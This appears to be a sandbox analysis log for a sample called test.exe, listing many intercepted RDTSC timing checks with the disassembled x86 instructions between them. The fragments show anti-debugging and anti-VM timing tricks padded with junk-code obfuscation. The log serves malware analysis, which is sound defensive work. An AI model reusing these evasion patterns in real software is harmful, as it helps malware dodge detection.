              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F04FEA second address: F05001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F403D12A5BCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F05001 second address: F05005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F05005 second address: F0500B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F0500B second address: F05023 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403C75C900h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F0AEFD second address: F0AF01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F0AF01 second address: F0AF0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F403C75C8F8h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F0AF0F second address: F0AF33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403D12A5C9h 0x00000007 pushad 0x00000008 jnl 00007F403D12A5B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E69C11 second address: E69C15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E69C15 second address: E69C35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F403D12A5C2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F403D12A5C2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E69C35 second address: E69C3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E69C3B second address: E69C70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F403D12A5E7h 0x0000000b jmp 00007F403D12A5C5h 0x00000010 pushad 0x00000011 jmp 00007F403D12A5C0h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F098D6 second address: F098DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F098DB second address: F098E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F098E0 second address: F09920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F403C75C8F6h 0x0000000a jl 00007F403C75C8F6h 0x00000010 jmp 00007F403C75C8FAh 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 jmp 00007F403C75C8FEh 0x0000001e push ecx 0x0000001f pushad 0x00000020 popad 0x00000021 pop ecx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 pop eax 0x00000026 jmp 00007F403C75C8FCh 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F09920 second address: F09934 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F403D12A5B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F403D12A5B6h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F09C6B second address: F09C75 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F403C75C8F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB66EC second address: EB66F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB66F0 second address: EB66F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB66F4 second address: EB675F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D368Ah], edi 0x0000000e mov ebx, dword ptr [ebp+12489864h] 0x00000014 pushad 0x00000015 or edi, dword ptr [ebp+122D2122h] 0x0000001b mov edx, dword ptr [ebp+122D3826h] 0x00000021 popad 0x00000022 jnl 00007F403D12A5B6h 0x00000028 add eax, ebx 0x0000002a push 00000000h 0x0000002c push edx 0x0000002d call 00007F403D12A5B8h 0x00000032 pop edx 0x00000033 mov dword ptr [esp+04h], edx 0x00000037 add dword ptr [esp+04h], 00000019h 0x0000003f inc edx 0x00000040 push edx 0x00000041 ret 0x00000042 pop edx 0x00000043 ret 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 jne 00007F403D12A5CDh 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB675F second address: EB67D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F403C75C8F8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 mov dx, di 0x0000002a mov dword ptr [ebp+122D368Ah], edi 0x00000030 push 00000004h 0x00000032 push 00000000h 0x00000034 push esi 0x00000035 call 00007F403C75C8F8h 0x0000003a pop esi 0x0000003b mov dword ptr [esp+04h], esi 0x0000003f add dword ptr [esp+04h], 0000001Ch 0x00000047 inc esi 0x00000048 push esi 0x00000049 ret 0x0000004a pop esi 0x0000004b ret 0x0000004c ja 00007F403C75C902h 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB67D6 second address: EB67DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB67DA second address: EB67E4 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F403C75C8F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F12FCF second address: F12FDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F11055 second address: F110A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F403C75C8F6h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F403C75C8FDh 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F403C75C907h 0x0000001b jne 00007F403C75C8F6h 0x00000021 jmp 00007F403C75C900h 0x00000026 popad 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F111EA second address: F111EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F117D5 second address: F117EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 jmp 00007F403C75C8FDh 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F117EA second address: F117EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F11B29 second address: F11B3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F403C75C8FDh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F1268B second address: F126DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403D12A5BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d jmp 00007F403D12A5C6h 0x00000012 jc 00007F403D12A5B8h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a popad 0x0000001b pushad 0x0000001c jmp 00007F403D12A5C7h 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F126DC second address: F126FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F403C75C8FBh 0x0000000c jmp 00007F403C75C8FAh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F129EC second address: F12A1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F403D12A5C0h 0x0000000b jmp 00007F403D12A5BAh 0x00000010 push edi 0x00000011 jmp 00007F403D12A5C7h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F12CC6 second address: F12CCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F12CCA second address: F12CE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F403D12A5C8h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F12CE8 second address: F12CF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F403C75C8F6h 0x00000009 jns 00007F403C75C8F6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F16C8E second address: F16C9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jns 00007F403D12A5B6h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F15EC7 second address: F15ECB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F15ECB second address: F15EE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F403D12A5C7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F162D6 second address: F162DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F162DA second address: F162E0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F16436 second address: F1643B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F1643B second address: F16441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F16582 second address: F165A2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F403C75C8F6h 0x00000008 jnl 00007F403C75C8F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F403C75C8FCh 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F1CBB6 second address: F1CBC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403D12A5BCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F1CBC6 second address: F1CBCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F1CBCC second address: F1CBD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F403D12A5B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F25C41 second address: F25C46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F25C46 second address: F25C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F24947 second address: F24966 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f pop eax 0x00000010 jg 00007F403C75C8F6h 0x00000016 popad 0x00000017 je 00007F403C75C8FCh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F24966 second address: F2496A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F2496A second address: F24988 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F403C75C904h 0x00000009 jl 00007F403C75C8F6h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F24AEA second address: F24AF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F24AF1 second address: F24B16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F403C75C8F6h 0x00000009 jmp 00007F403C75C908h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F2539B second address: F253D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F403D12A5C3h 0x0000000a pop edi 0x0000000b pushad 0x0000000c jmp 00007F403D12A5C4h 0x00000011 je 00007F403D12A5BCh 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F253D8 second address: F253EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F403C75C901h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F239E2 second address: F239EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F239EB second address: F23A04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403C75C905h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F23A04 second address: F23A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F403D12A5B6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F2B5E3 second address: F2B5E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F380E2 second address: F38106 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403D12A5C0h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F403D12A5BEh 0x00000011 pushad 0x00000012 popad 0x00000013 jbe 00007F403D12A5B6h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F37DDB second address: F37DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F37DE1 second address: F37DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F3AB91 second address: F3ABA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F403C75C8F6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F3ABA7 second address: F3ABB7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F403D12A5B6h 0x00000008 jnp 00007F403D12A5B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F3ABB7 second address: F3ABC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F403C75C8F6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F3ABC1 second address: F3ABDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403D12A5BCh 0x00000007 jg 00007F403D12A5B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F3ABDA second address: F3ABE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F3ABE0 second address: F3ABE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F42F26 second address: F42F35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F403C75C8F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F42F35 second address: F42F46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F403D12A5BCh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F42F46 second address: F42F4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F42F4C second address: F42F79 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F403D12A5C9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F403D12A5BBh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F4E0B5 second address: F4E0C4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007F403C75C8F6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F4DF5B second address: F4DF79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F403D12A5C8h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F55696 second address: F5569C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F5569C second address: F556EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F403D12A5C6h 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F403D12A5C8h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F403D12A5C0h 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F556EF second address: F556F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F556F5 second address: F55714 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F403D12A5C8h 0x00000008 pop ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F5475B second address: F5475F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F548A8 second address: F548AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F548AE second address: F548B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F553B3 second address: F553CD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F403D12A5C0h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F553CD second address: F553D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F57D87 second address: F57D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F57D8D second address: F57D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F57D91 second address: F57D95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F57D95 second address: F57D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F660A3 second address: F660C3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F403D12A5CAh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F660C3 second address: F660CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F403C75C8F6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F660CD second address: F660E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403D12A5C8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F660E9 second address: F66103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b jc 00007F403C75C8F6h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pop edi 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F686CA second address: F686D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F628CF second address: F628D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F628D3 second address: F628DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F628DC second address: F628E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F76624 second address: F76629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
